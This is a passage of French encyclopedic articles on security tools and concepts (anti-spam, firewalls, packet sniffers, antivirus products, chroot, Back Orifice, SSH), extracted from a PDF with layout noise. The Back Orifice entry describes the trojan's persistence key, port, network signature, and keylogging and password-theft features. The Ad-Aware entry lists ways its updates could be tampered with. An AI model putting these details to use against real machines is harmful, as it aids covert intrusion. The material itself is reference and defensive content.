d'enfants ne sera pas une bonne idée ; • si on commet d'autres délits, comme la fraude ou le sabotage des pages Web ou sites informatisés, on peut se retrouver en prison ; •• l'envoi de spam peut être considéré comme un vol et/ou une tentative d'intrusion dans un système informatique. C'est ce qui permet aux autorités de la Chine d'appliquer théoriquement la peine de mort physique contre les spammeurs. L'emprisonnement est rare mais cela arrive : Dave Rhodes, qui envoyait des arnaques du genre Ponzi ou « pyramide » intitulées « Make Money Fast » au début des années 1990, se retrouva en prison pour quelques années, déclaré coupable de fraude. La République populaire de Chine a déjà condamné à mort et exécuté des personnes dont le seul crime était l'envoi de spams. La base judiciaire utilisée est la requalification du délit en crime d'espionnage. Le plus souvent, les poursuites judiciaires qui se sont déjà déroulées étaient des procès civils coûteux amorcés par les grands fournisseurs comme AOL ou Yahoo! contre les spammeurs les plus abusifs du réseau, ceux qui envoient des millions de courriels. Le site cyberpromo.com a dû fermer ses portes à cause de poursuites judiciaires de ce genre et à cause de difficultés à trouver un fournisseur d'accès à Internet prêt à donner l'accès au réseau à une telle compagnie. Comme le problème est international, les lois nationales ont assez peu d'effet sur le volume du pollupostage. Finalement, 2005 est une année charnière en ce que les condamnations se sont multipliées. Plusieurs spammeurs américains ont été arrêtés, condamnés et emprisonnés. Les amendes s'élèvent à plusieurs dizaines ou centaines de milliers de dollars et les peines de prison peuvent atteindre plus d'un an. Lutte anti-spam 207

En France aussi, quelques condamnations ont eu lieu en 2005 avec plus ou moins de publicité. En France, depuis 2007 il existe la plate-forme nationale de signalement : Signal Spam. Concernant le spam sur téléphones mobiles (par SMS), le service 33700 a été ouvert en 2008. Certains attribuent une relative baisse du volume de pollupostage observé à ces actions sans qu'il soit possible de le confirmer encore.

Notes et références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=Lutte_anti-spam& action=edit

[2] voir Liste des heuristiques de SpamAssassin (anglais) (http:/ / spamassassin. apache. org/ tests_3_2_x. html)

[3] http:/ / www. ietf. org/ rfc/ rfc2821. txt

[4] (http:/ / projects. puremagic. com/ greylisting/ whitepaper. html).

[5] ASRG (ANTI-SPAM Research Group)/IRTF Captchas (http:/ / wiki. asrg. sp. am/ wiki/ Captchas)

[6] W3C Working Group Note : Inaccessibility of CAPTCHA (http:/ / www. w3. org/ TR/ turingtest/ )

[7] American Council of the Blind (http:/ / www. acb. org/ board-minutes/ bm070802. html)

[8] Référentiel général d'accessibilité des administrations, annexe 1 (http:/ / www. references. modernisation. gouv. fr/ sites/ default/ files/

RGAA-v2. 2_Annexe1-Criteres. pdf)

[9] Union européenne : et si on taxait les mails et les SMS ? (http:/ / www. pcinpact. com/ news/

29045-Union-europeenne-et-si-on-taxait-les-mails-e. htm) sur PC Inpact

[10] Alain Lamassoure (député européen) : "La taxe sur les e-mails et SMS n'aura pas lieu. (http:/ / www. journaldunet. com/ 0606/

060612-lamassoure. shtml) sur le Journal du Net

[11] Taxe courrier électronique (http:/ / www. hoaxbuster. com/ hoaxliste/ taxe-courrier-electronique) (Hoaxbuster 2012)

Annexes

Articles connexes •• Courrier électronique • Spam, Signal Spam •• Nétiquette •• SMTP •• Captcha • Network Abuse Clearinghouse (liste d'adresses emails de type abuse) Variétés de spams : •• Hameçonnage •• Fraude 4-1-9 •• Canular informatique •• Spambot • Splog (publogue) •• Vente pyramidale •• Chaîne d'argent Lutte anti-spam 208

Liens externes

• Signal Spam (http:/ / www. signal-spam. fr/ index. php/ frontend/ presentation) : association française de type loi 1901

• SecuriteInfo.com (http:/ / www. securiteinfo. com/ attaques/ divers/ lutter_contre_le_spam. shtml) : Signatures antispam français pour Clamav

• Portail de la sécurité informatique • Portail de l’informatique Pare-feu personnel

Un pare-feu personnel est un logiciel, installé sur un ordinateur personnel d'un utilisateur, qui contrôle les communications entrantes et sortantes, autorisant ou refusant celles-ci suivant la politique de sécurité mise en œuvre sur le système.

Différences avec un pare-feu conventionnel

Un pare-feu personnel est bien différent du pare-feu traditionnel, puisqu'il n'y a pas de séparation physique entre ce

pare-feu et les applications, tous ces logiciels tournant sur le Firewall personnel sous Linux demandant de confirmer le même système. blocage ou l'autorisation d'une session Un pare-feu personnel va tenter de cloisonner uniquement le système sur lequel il est installé et un réseau (bien souvent Internet), à moins que celui-ci n'offre un partage de connexion pour d'autres ordinateurs. Une autre distinction avec les boîtiers/logiciels pare-feu conventionnels est que les pare-feu personnels sont capables de contrôler les communications en utilisant des méthodes interactives avec l'utilisateur. Certains pare-feu personnels demandent ainsi, à chaque nouvelle tentative de connexion, si celle-ci est légitime. Ceux-ci enregistrent la réponse, ce qui leur permet de déterminer quel trafic l'utilisateur veut autoriser, et quel est celui qu'il veut bloquer.

Schéma de principe d'un pare-feu personnel Pare-feu personnel 209

Liens externes • (en) Top Home User Security: Personal Firewalls [1]

• Portail de la sécurité informatique

Références

[1] http:/ / www. securityfocus. com/ infocus/ 1750

Analyseur de paquets

Un analyseur de paquets[1] ». est un logiciel pouvant lire ou enregistrer des données transitant par le biais d'un réseau local non-commuté. Il permet de capturer chaque paquet du flux de données (en) traversant le réseau, voire, décoder les paquets de données brutes (en), afficher les valeurs des divers champs du paquet, et analyser leur contenu conformément aux spécifications ou RFC appropriées. L'analyseur de paquets permet ainsi la résolution de problèmes réseaux en visualisant ce qui passe à travers l'interface réseau, mais peut également servir à effectuer de la rétro-ingénierie réseau à des buts d'interopérabilité, de sécurité ou de résolution de problème. Il peut aussi être utilisé pour intercepter des mots de passe qui transitent en clair ou toute autre information non-chiffrée pour sa capacité de consultation aisée des données non-chiffrées.

Types Les sniffers sont des sortes de sondes que l'on place sur un réseau pour l'écouter et en particulier parfois récupérer à la volée des informations sensibles lorsqu'elles ne sont pas chiffrées, comme des mots de passe (parfois sans que les utilisateurs ou les administrateurs du réseau ne s'en rendent compte). Le renifleur peut être un équipement matériel ou un logiciel : le premier est bien plus puissant et efficace que le second, encore que, la puissance des machines augmentant sans cesse, l'écart se resserre. Mais le premier est surtout beaucoup plus cher que le second.

Fonctionnement Lorsqu'une machine veut communiquer avec une autre sur un réseau non-commuté (relié par un hub ou câblé en câble coaxial, qui sont des techniques obsolètes), elle envoie ses messages sur le réseau à l'ensemble des machines et normalement seule la machine destinataire intercepte le message pour le lire, alors que les autres l'ignorent. Ainsi en utilisant la méthode du sniffing, il est possible d'écouter le trafic passant par un adaptateur réseau (carte réseau, carte réseau sans fil, etc.). Pour pouvoir écouter tout le trafic sur une interface réseau, celle-ci doit être configurée dans un mode spécifique, le « mode promiscuous ». Ce mode permet d'écouter tous les paquets passant par l'interface, alors que dans le mode normal, le matériel servant d'interface réseau élimine les paquets n'étant pas à destination de l'hôte. Par exemple, il n'est pas nécessaire de mettre la carte en mode « promiscuous » pour avoir accès aux mots de passe transitant sur un serveur FTP, vu que tous les mots de passe sont à destination dudit serveur. Le packet sniffer décompose ces messages et les rassemble, ainsi les informations peuvent être analysées à des fins frauduleuses (détecter des logins, des mots de passe, des emails), analyser un problème réseau, superviser un trafic ou encore faire de la rétro-ingénierie. Analyseur de paquets 210

Sécurité La solution à ce problème d'indiscrétion est d'utiliser des protocoles de communication chiffrés, comme SSH (SFTP, scp), SSL (HTTPS ou FTPS) (et non des protocoles en clair comme HTTP, FTP, Telnet). La technique du sniffing peut être ressentie comme profondément malhonnête et indélicate, mais elle est souvent nécessaire lorsque l'on est à la recherche d'une panne.

Notes et références

Références

[1] de l'anglais « packet analyzer », également connu sous les appellations anglophones « network analyzer », « protocol analyzer » ou sniffer que l'on peut traduire littéralement par analyseur de réseau (informatique), analyseur de protocole (réseau) ou simplement renifleur, sniffeur ou « renifleur de paquets

Notes

Articles connexes • Cain & Abel •• dSniff •• tcpdump •• Wireshark •• Comparaison de packet sniffers •• Analyseur logique •• Analyseur de bus

• Portail des réseaux informatiques • Portail de l’informatique • Portail des télécommunications • Portail de la sécurité informatique 211

6.2-Exemples

Ad-Aware

Logo

Développeur Lavasoft

Dernière version [1] 10.2 (17 juillet 2012) //fr.wikipedia.org/w/index.php?title=Modèle:Dernière_version_stable/Ad-Aware&action=edit +/- Environnement Microsoft Windows

Langue Multilingue

Type anti-virus & anti-logiciels espion

Politique de distribution freeware et shareware selon éditions

Licence Propriétaire

Site web [2] Lavasoft

[3] modifier

Ad-Aware est un logiciel de la société Lavasoft qui détecte et supprime les virus, les logiciels considérés comme des publiciels (sa vocation première) et des logiciels espion (spyware, malware). Il détecte également les composeurs, les chevaux de Troie et les autres logiciels malveillants.

Présentation Il existe une version freeware Ad-Aware 2010 Free, et trois versions en partagiciel : Ad-Aware 2010 Plus, Ad-Aware 2010 Pro et Ad-Aware Total Security La principale différence entre la version gratuite et les versions Plus, Pro et Total Security est que ces dernières incluent une vérification du système en temps-réel. La vérification en temps-réel permet d'être protégé en permanence au cours de la navigation sur le Web, sans avoir besoin de lancer manuellement la vérification comme dans la version gratuite.

Critiques de performance En avril 2006, un expert en sécurité informatique déclare que le logiciel Ad-Aware est mal conçu et mal programmé, et que l'utiliser donnerait une illusion de sécurisation du système. En effet, de nombreuses attaques sur ce logiciel peuvent être réalisées, en raison de sa pauvreté de conception et de programmation : 1. Le fichier de définition (sorte de base de données de signatures de logiciels espion) est chiffré par XOR. 2. Il est compressé dans un fichier ZIP, protégé par un simple mot de passe ; il est trivial et rapide d'intercepter les mises à jour de définitions et de les changer. 3. Aucune somme de contrôle n'est effectuée sur ce fichier. 4.4.De nombreuses redondances et de multiples entrées dans le fichier de définition font croire à une base de données importante. Ad-Aware 212

5. Le programme implémente de manière incorrecte un algorithme de somme de contrôle. 6.6.Le programme implémente de manière incorrecte un algorithme de scan. 7. La technologie CSI (Code Sequence Identification) développée par Lavasoft ne fonctionne que sur des images en mémoire et est inutile. Le moteur d'Ad-Aware a été entièrement réécrit dans la version Ad-Aware 2007.

Evolutions du logiciel En 2007 ce logiciel était commercialisé par Wanadoo sous le nom Securitoo. La version 2010, sortie en mars de la même année, laisse apparaitre une nouveauté majeure : le logiciel est désormais un programme anti-virus[4] en complément des fonctionnalités déjà existantes (anti-logiciels espion, etc).

Références

[1] http:/ / ad-aware. softonic. fr/

[2] http:/ / www. lavasoft. com

[3] http:/ / fr. wikipedia. org/ w/ index. php?title=Ad-Aware& action=edit& section=0

[4] Exclusivité : Ad-Aware 10, le nouvel anti-virus gratuit, Baptiste Brassart (http:/ / onsoftware. softonic. fr/ decouvrez-ad-aware-free-antivirus-10), 28 mars 2012, consulté sur site onsoftware.softonic.fr le 20 avril 2012

Liens externes

• (fr) Site officiel de Lavasoft (http:/ / www. lavasoft. fr/ ) (Offres payantes et gratuites)

• (fr) Comparatif de logiciels de désinfection (mars 2008) (http:/ / www. clubic. com/

article-127290-1-antispyware-comparatif-de-6-solutions. html)

• (en) Analyse de sécurité sur le logiciel (http:/ / www. rootkit. com/ newsread. php?newsid=471)

• Portail de la sécurité informatique • Portail du logiciel BSD Jail 213 BSD Jail

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Les BSD Jails (« jail » signifie prison en anglais) sont une architecture logicielle propre au système d'exploitation FreeBSD, qui permettent de compartimenter des processus et leurs descendants. En pratique, les jails sont souvent utilisées pour répondre à deux besoins : • contraindre l'exécution d'une application sensible (une application tournant avec des privilèges importants, comme un serveur FTP par exemple); cela permet de garder le système hôte sain en cas de problèmes avec l'application « emprisonnée » suite à une activité malveillante ou tout simplement lors de tests/débogage ; •• faire une « image virtuelle du système » permettant l'exécution de multiples applications ; les objectifs sont les mêmes que précédemment, mais à plus large échelle. Souvent, une installation assez complète du système est nécessaire au bon fonctionnement des applications placées dans une jail : bibliothèques, fichiers de configuration, etc. Les jails BSD rappellent le chroot, tout en offrant plus de sécurité et de plus grandes possibilités de configuration.

Liens externes • Page du manuel de FreeBSD sur les jails [1] • (en) Page de manuel de jail [2]

• Portail de la sécurité informatique

Références

[1] http:/ / www. freebsd. org/ doc/ fr_FR. ISO8859-1/ books/ handbook/ jails. html

[2] http:/ / www. freebsd. org/ cgi/ man. cgi?query=jail& apropos=0& sektion=0& manpath=FreeBSD+ 5. 3-RELEASE+ and+ Ports& format=html Chroot 214 Chroot

chroot (change root) est une commande des systèmes d'exploitation UNIX permettant de changer le répertoire racine d'un processus de la machine hôte.

Objectif Cette commande permet d'isoler l'exécution d'un programme et d'éviter ainsi la compromission complète d'un système lors de l'exploitation d'une faille. Si un pirate utilise une faille présente sur l'application chrootée, il n'aura accès qu'à l'environnement isolé et non pas à l'ensemble du système d'exploitation. Cela permet donc de limiter les dégâts qu'il pourrait causer. Il permet également de faire tourner plusieurs instances d'un même ensemble de services ou démons sur la même machine hôte. Par exemple, il est possible avec chroot d'exécuter des applications 32 bits sur un système 64 bits : il suffit pour cela d'avoir un sous-système qui intègre toutes les bibliothèques logicielles nécessaires ; chroot permet de se connecter à l'intérieur de ce sous-système, et d'y exécuter les applications installées.

Outil GNU chroot est un outil GNU faisant partie de coreutils et plus précisément des shellutils.

OpenSSL

Cet article est une ébauche concernant la cryptologie, la sécurité informatique et un logiciel libre. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

OpenSSL

Développeur The OpenSSL Project

Dernière version [1] 1.0.1e (le 11 février 2013) //fr.wikipedia.org/w/index.php?title=Modèle:Dernière_version_stable/OpenSSL&action=edit +/- Environnements Multiplate-forme

Type Bibliothèque logicielle

Licence Licence BSD

Site web [2] www.openssl.org

[3] modifier

OpenSSL est une boite à outils de chiffrement comportant deux bibliothèques (libcrypto fournit les algorithmes cryptographiques, libssl implémente le protocole SSL) et une interface en ligne de commande (openssl). Les bibliothèques (qui sont écrites en langage C) implémentent les fonctions basiques de cryptographie et fournissent un certain nombre de fonctions utiles. Grâce aux wrappers, il est possible de les utiliser dans une grande variété de langages informatiques. Les paramètres de l'outil en ligne de commande openssl sont très nombreux ; ils permettent entre autres de choisir l'un des nombreux types de chiffrement (Blowfish, DES ou Triple DES, DSA, RC4, RC5, RSA...), OpenSSL 215

d'encodage (base64...) ou de hachage (MD5, SHA-1...). Cet utilitaire et les bibliothèques associées sont disponibles pour la plupart des Unix dont Linux et Mac OS X, mais aussi pour Microsoft Windows, DOS et OpenVMS. Le support des cartes accélératrices câblées est intégré à la branche principale depuis la version 0.9.7. OpenSSL, qui est basé sur SSLeay de Eric Young et Tim Hudson, est distribué selon les termes d'une double licence de type BSD[4].

Bibliographie • (en) John Viega, Matt Messier et Pravir Chandra, Network Security with OpenSSL, O'Reilly, 2002, 386 p. (ISBN 0-596-00270-X)

Notes et références

[1] https:/ / www. openssl. org/

[2] http:/ / www. openssl. org/

[3] http:/ / fr. wikipedia. org/ w/ index. php?title=OpenSSL& action=edit& section=0

[4] OpenSSL: Source, License (http:/ / www. openssl. org/ source/ license. html)

HijackThis

HijackThis est un outil d'aide à la détection de paramètres modifiés par des programmes malveillants, sur les systèmes d'exploitation Microsoft Windows. Les droits de ce programme appartiennent à la société Trend Micro.

Présentation HijackThis est un centre de contrôle qui permet de détecter les installations nuisibles sur les navigateurs web et les logiciels qui se lancent au démarrage de Windows. Il peut aussi enregistrer les paramètres de configuration du système et les restaurer en cas de problème. Il fournit un log après l'analyse.

Fonctionnement HijackThis crée la liste des points sensibles dans la base de registre, les processus et les services, ainsi que dans d'autres endroits, favoris des logiciels malveillants. Cette liste, une fois visualisée par l'utilisateur, est utilisée pour supprimer les entrées de la base de registre altérées par les malwares. HijackThis ne supprime pas les fichiers sur le disque dur, ceci est à faire manuellement après la modification de la base de registre. HijackThis est aussi capable : • d'afficher et arrêter les processus en mémoire ainsi que les dll qui en dépendent ; •• de supprimer un fichier au redémarrage de la machine. Dans certains cas il est difficile de supprimer des fichiers, car ces dernières restent en mémoire. HijackThis permet de supprimer ces fichiers au redémarrage de Windows avant qu'ils soient présents en mémoire ; • de lister et supprimer les rootkits utilisant les ADS (Alternate Data Stream File) ce qui permet de cacher des fichiers du disque dur. HijackThis 216

Historique Le créateur de HijackThis est Merijn Bellekom, un étudiant en chimie hollandais et développeur sur le forum SpyWareInfo[1]. Merijn Bellekom a arrêté l'amélioration de ce logiciel. La version finale était donc la 1.99.1 avant qu'il ne revende ce programme à la société Trend Micro[2] début 2007.

Liens externes • Site officiel [3] •• Tutoriels: • sur Zebulon.fr [4] • sur Malekal.com [5] • sur BleepingComputer.com [6] • Analyse en ligne d'un rapport [7]

Notes

[1] http:/ / www. spywareinfoforum. com/

[2] hijackthis chez Trend (http:/ / www. trendsecure. com/ portal/ en-US/ threat_analytics/ hijackthis. php)

[3] http:/ / www. trendsecure. com/ portal/ fr/ tools/ security_tools/ hijackthis/ overview

[4] http:/ / www. zebulon. fr/ articles/ HijackThis. php

[5] http:/ / www. malekal. com/ 2010/ 11/ 12/ tutorial-et-guide-hijackthis/

[6] http:/ / www. bleepingcomputer. com/ tutorials/ comment-utiliser-hijackthis/

[7] http:/ / www. hijackthis. de/ fr

• Portail de la sécurité informatique Chkrootkit 217 Chkrootkit

Chkrootkit

Logo

Développeur Pangeia Informatica

Dernière version 0.49 (30 juillet 2009)

Environnement UNIX

Type Détecteur de rootkit

Licence GNU GPL

Site web [1] www.chkrootkit.org

[2] modifier

chkrootkit est un logiciel libre sous licence GNU GPL permettant de détecter si un système UNIX n'a pas été compromis par un rootkit. Il permet de détecter les traces d'une attaque et de rechercher la présence d'un rootkit sur un système Unix/Linux en vérifiant les quelques points suivants : •• si des fichiers exécutables du système ont été modifiés ; •• si la carte réseau est en mode « promiscuous » ; • si un ou des vers LKM (Loadable Kernel Module) sont présents. La vérification effectuée au sujet du mode promiscuous consiste à voir Chkrootkit sur une machine Linux si la carte réseau est configurée pour récupérer et lire toutes les trames, indiquant la possibilité qu'un sniffer soit installé sur le système. La définition exacte de rootkit donnée par Le Jargon Français est : « ensemble d'exploits réunis afin d'avoir des chances maximales de piquer un compte root (administrateur), c'est-à-dire avec lequel on peut faire n'importe quoi) sur une machine Unix. »

Références

[1] http:/ / www. chkrootkit. org/

[2] http:/ / fr. wikipedia. org/ w/ index. php?title=Chkrootkit& action=edit& section=0 ClamAV 218 ClamAV

ClamAV

Logo

Développeurs [1] Tomasz Kojm et al.

Dernière version [2] 0.97.8 (le 23 avril 2013) //fr.wikipedia.org/w/index.php?title=Modèle:Dernière_version_stable/ClamAV&action=edit +/- Environnements Multiplate-forme

Langue Anglais

Type Antivirus

Licence GNU GPL

Site web [3] www.clamav.net

[4] modifier

ClamAV (« Clam AntiVirus »), est un logiciel antivirus pour UNIX. Il est généralement utilisé avec les serveurs de courriels pour filtrer les courriers comportant des virus. Les virus ciblés sont très majoritairement des virus s'attaquant au système d'exploitation Microsoft Windows et non pas aux systèmes sur lesquels ClamAV s'installe, qui sont peu menacés par les virus. Le moteur antivirus est la bibliothèque libclamav écrite en C.

Évolutions La base de données des virus connus est basée sur celle de l'ancien projet libre antivirus OpenAntiVirus ; celle-ci contenait environ 7 000 signatures. En février 2005, la base de données est de 30 000 souches connues. Début avril 2006, elle atteint les 50 000 souches connues. Le 18 mars 2007, la base de données atteint 100 000 logiciels malveillants connus[5]. En août 2007, ClamAV est l'un des meilleurs antivirus du marché, classé au cours d'un test public second derrière Kaspersky[6],[7]. Le 17 août 2007, ClamAV est racheté par la société Sourcefire[8], société qui a déjà acquis Snort. Sourcefire dit vouloir offrir du support et de la formation à ClamAV dès le dernier trimestre 2007. Sourcefire affirme que ClamAV ClamAV 219

restera sous licence GPL[9]. Pour l'équipe de développement de ClamAV, cette acquisition par Sourcefire offrira des moyens supplémentaires financiers et humains, et surtout une excellente base de signatures. Début septembre 2007, il dépasse la barre des 150 000 logiciels malveillants reconnus. Début février 2008, il dépasse la barre des 200 000 logiciels malveillants reconnus. Début décembre 2008, plus de 450 000 logiciels malveillants reconnus. Début décembre 2009, la barre des 650 000 logiciels malveillants reconnus est dépassée. Le 18 juillet 2011, la barre du million est dépassée : 1 000 066 signatures exactement[10]. Le 19 juin 2012, Tomasz Kojm (initiateur du projet), Alberto Wu, Luca Gibelli et Edwin Török quittent Sourcefire[11]. Cette section est vide, insuffisamment détaillée ou incomplète. Votre aide [12] est la bienvenue !

libclamav libclamav est la bibliothèque moteur de ClamAV, utilisée dans d'autres logiciels. C'est un logiciel libre écrit en C et distribué sous licence GNU GPL. Cette section est vide, insuffisamment détaillée ou incomplète. Votre aide [12] est la bienvenue !

Interfaces graphiques Différentes interfaces graphiques sont disponibles : •• Windows •• ClamWin •• Immunet •• Unix • ClamTk (GTK+) • KlamAV (KDE) •• Mac OS X •• ClamXav

Utilisation de ClamAV en milieu professionnel ClamAV est utilisé dans la future version des pare-feu Check Point « NGX VPN-1 Edge Embedded » ainsi que dans les pare-feu Barracuda Network et SecuriteInfo.com, en tant qu'antivirus filtrant les flux en transit. Nous retrouvons aussi cet antivirus dans les appliances Netasq, EdenWall et LinkGate (Sysun Secure).

Références

[1] Sourcefire Vulnerability Research Team (http:/ / www. clamav. net/ lang/ en/ about/ team/ )

[2] http:/ / blog. clamav. net/ 2013/ 04/ clamav-0978-has-been-released. html

[3] http:/ / www. clamav. net/

[4] http:/ / fr. wikipedia. org/ w/ index. php?title=ClamAV& action=edit& section=0

[5] 100.000 signatures (http:/ / www. clamav. net/ lang/ en/ 2007/ 03/ 18/ 100000-signatures/ )

[6] Untangle tests AntiVirus tools in LinuxWorld ‘Fight Club’ (http:/ / www. clamav. net/ lang/ en/ 2007/ 08/ 09/

untangle-tests-antivirus-tools-in-linuxworld-fight-club/ )

[7] Untangle Fight Club (http:/ / virus. untangle. com/ )

[8] Sourcefire acquires ClamAV (http:/ / www. clamav. net/ lang/ en/ 2007/ 08/ 17/ sourcefire-acquires-clamav/ )

[9] FAQ – Sourcefire acquisition (http:/ / www. clamav. net/ lang/ en/ faq/ faq-sf/ )

[10] Just for the records (http:/ / blog. clamav. net/ 2011/ 07/ just-for-records. html)

[11] A New Chapter for ClamAV (http:/ / blog. clamav. net/ 2012/ 06/ new-chapter-for-clamav. html) ClamAV 220

[12] http:/ / fr. wikipedia. org/ w/ index. php?title=ClamAV& action=edit

NOD32

Logo

Développeur ESET

Dernière version 6.0.316.1 (avril 2013)

Environnement Windows, Linux, FreeBSD, Novell, windows 7

Type Antivirus

Licence Propriétaire

Site web [1] [2] nod32.com ,eset.eu

[3] modifier

NOD32 est un logiciel antivirus créé par la société slovaque ESET. Il existe des versions pour Windows, Mac, Linux, Android et d'autres plateformes.

Caractéristiques Avant la version 3.0 NOD32 se distinguait des autres logiciels antivirus principalement par son interface extrêmement austère, qui pouvait perturber un utilisateur débutant. Depuis la version 3.0, l'interface a connu une véritable rénovation au niveau esthétique permettant ainsi au logiciel de devenir accessible au grand public, tout en restant très paramétrable via le panneau de configuration avancé.

Fonctionnalités NOD32 se composait de 5 interfaces (avec la version 2.7 du programme) appelées modules de protection : • AMON surveille constamment l'ordinateur en analysant automatiquement les fichiers ouverts • DMON analyse automatiquement les documents Microsoft Office • EMON analyse automatiquement les courriels Microsoft Outlook • IMON surveille en permanence les connexions Internet • NOD32 scanne une partie ou l'intégralité du système lorsque lui en est fait la demande. Aujourd'hui, ces classifications se sont quelque peu estompées avec les dernières versions qui aspirent à être plus transparentes, moins rebutantes pour harmoniser la communication des différents modules du logiciel. Depuis la version 3.0 se décline une suite nommée ESET Smart Security qui comprend en plus de l'antivirus NOD32, un pare-feu et un module anti-spam. La version 4 de la suite Eset Smart Security ajoute le support du client mail Mozilla Thunderbird pour son module anti-spam. Il incorpore aussi son logiciel ESET SysInspector et l'on peut désormais créer un CD de sauvetage grâce à ESET SysRescue qui permet (uniquement sous Windows Vista) de construire un disque de pré-installation de Windows. NOD32 221

NOD32 possède un système de mise à jour automatique des signatures virales et des composants. La base de donnée des signatures virales est généralement mise à jour quotidiennement. Le planificateur permet de gérer l'exécution automatique des mises à jour. Comme la plupart des autres logiciels antivirus, NOD32 possède également : •• un système de mise en quarantaine des fichiers, •• des interfaces de rapports des menaces / du scanner / de mise à jour.

Liens externes • site comparatif antivirus [4]

• Portail de la sécurité informatique

Références

[1] http:/ / www. nod32. com

[2] http:/ / www. eset. eu

[3] http:/ / fr. wikipedia. org/ w/ index. php?title=NOD32& action=edit& section=0

[4] http:/ / www. av-comparatives. org/

Back Orifice

Back Orifice est un logiciel client/serveur d'administration et de prise de contrôle à distance de machines utilisant le système d'exploitation Windows ; il ne s'agit pas vraiment d'un virus, mais plutôt d'un rootkit. Il est créé et distribué par un groupe de hackers, Cult of the Dead Cow (cDc), en août 1998[1]. L'auteur principal de Back Orifice est « Sir Dystic »[2] ; et celui de BO2K est « DilDog »[3]. Le code source est open source (GNU GPL) et disponible sur sourceforge.

Origine et Cible Son nom est inspiré par le logiciel Back Office de la société Microsoft ainsi que par le plaisir d'un jeu de mots quelque peu grivois. Le logiciel s'attache aux machines utilisant un système d'exploitation Windows 95/98, et NT pour BO2K[3]. Le client peut s'exécuter sous Windows 95/98/NT et Unix (console uniquement)[]. Le programme est autonome : il n'a pas besoin qu'on installe des outils annexes.

Finalité L'auteur (Sir Dystic) précise que « les deux buts légitimes de BO sont la télémaintenance et la maintenance/surveillance [des réseaux Microsoft] »[2]. Pour BO2K, l'auteur regrette que l'accès à distance, chose très courante dans les systèmes de type Unix par le ssh, ne soit pas disponible sous Windows ; c'est pourquoi ils ont « amélioré les possibilités d'administration » de ces systèmes. Il « espère que Microsoft fera de son mieux pour s'assurer que son système d'exploitation est suffisamment bien conçu pour savoir gérer les améliorations apportées »[3]. Le communiqué de presse précise que BO2K « pourrait faire pression sur le léviathan [NdT: Microsoft] pour qu'il mette en place un modèle de sécurité dans son système d'exploitation » et qu'« en cas d'échec, leurs clients seront vulnérables aux crackers »[3]. La finalité originale de ce logiciel est douteuse, ses auteurs affirmant que son utilisation a été détournée sous forme de cheval de Troie. Toutefois, son comportement furtif et ses fonctionnalités spéciales (comme la récupération de Back Orifice 222

mots de passe à distance, ou le keylogger intégré) laissent planer le doute sur les motivations réelles des auteurs. Il a ainsi souvent été classé comme virus ou ver et sa signature est fréquemment reconnue comme dangereuse par les logiciels antivirus. En tout cas, il est clair qu'il s'agit d'une attaque contre Microsoft qui utilise l'absence de politique de sécurité[].

Fonctionnement La chaîne caractéristique de Back Orifice est *!*QWTY?. Il utilise le port 31337. On attribue ce choix au fait qu'en Leet speak, 31337 se lit ELEET (« élite »). Ce port est modifiable[]. Le client, utilisé par l'attaquant, est configurable, modulaire et même skinnable. Il comprend un système de marque-page et un logger. Il peut se connecter sur plusieurs serveurs à la fois[4]. Le serveur comprend un accès à un shell par telnet, un keylogger, un éditeur de registre, un serveur HTTP, des outils pour transférer, supprimer et installer des fichiers/programmes à distance, un accès au système de partage des réseaux Microsoft, un cracker de mot de passe (NT/95/98) et de quoi redémarrer la machine. Il supporte les redirections TCP, la résolution DNS et un contrôle des processus (démarrage, arrêt, listage)[4]. Il est aussi capable de détourner des messages système. L'accès à tout cela se fait en partie par une dll de 8ko incluse dans l'exécutable[]. Des plug-ins de cryptage 3DES et à la volée, de contrôle graphique (bureau avec clavier/souris, éditeur de registre), de support de l'UDP et de l'ICMP sont également disponibles[4]. L'utilitaire « NOBO » permet de détecter le trafic réseau généré par Back Orifice. Pour supprimer BO, il suffit de supprimer l'exécutable serveur ainsi que la clé de base de registre associée, puis de redémarrer[].

Utilisation L'installation se fait par une simple exécution du programme BOSERVE.EXE (122ko) : celui-ci va se renommer en .EXE (le nom du fichier est une espace) et ajouter le chemin de ce programme à la clé de base de registre HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices. Le serveur s'exécutera ainsi silencieusement à chaque démarrage de la machine ; de plus, il n'est pas visible dans la liste des processus exécutés[]. Le client graphique est lancé par BOGUI.EXE et le client console par BOCLIENT.EXE.

Commandes de base • System Info : liste les informations système : processeur, RAM, disques durs et partitions... • File view : affiche le contenu d'un fichier ; • HTTP Enable : lance le serveur http intégré ; • Process list : liste les processus en cours d'exécution ; • Reg list values : pour voir des clés de base de registre ; • System dialogbox : affiche sur le serveur un message personnalisé ; • System Passwords : pour voir tous les mots de passe stockés sur la machine en clair. Back Orifice 223

BO2K Un an après BO[3], « BO2K », pour « Back Orifice 2000 », est une évolution de BO apportant quelques améliorations et notamment le support de Windows NT. Le 2000 est aussi une référence aux produits de Microsoft (Windows 2000 et Office 2000).

Notes et références

Secure Shell

Fonction Session à distance sécurisée

Sigle SSH

Date de création 1995

Port 22

RFC RFC 4251

[1] modifier

Pile de protocoles

7. Application 6. Présentation 5. Session 4. Transport 3. Réseau 2. Liaison 1. Physique

Modèle Internet

Modèle OSI

[1] modifier

Secure Shell (SSH) est à la fois un programme informatique et un protocole de communication sécurisé. Le protocole de connexion impose un échange de clés de chiffrement en début de connexion. Par la suite, tous les segments TCP sont authentifiés et chiffrés. Il devient donc impossible d'utiliser un sniffer pour voir ce que fait l'utilisateur. Le protocole SSH a été conçu avec l'objectif de remplacer les différents programmes rlogin, telnet, rcp, ftp et rsh.

Le protocole Le protocole SSH existe en deux versions majeures : la version 1.0 et la version 2.0. La première version permet de se connecter à distance à un ordinateur afin d'obtenir un shell ou ligne de commande. Cette version souffrait néanmoins de problèmes de sécurité dans la vérification de l'intégrité des données envoyées ou reçues, la rendant vulnérable à des attaques actives. En outre, cette version implémentait un système sommaire de transmission de fichiers, et du port tunneling. Secure Shell 224

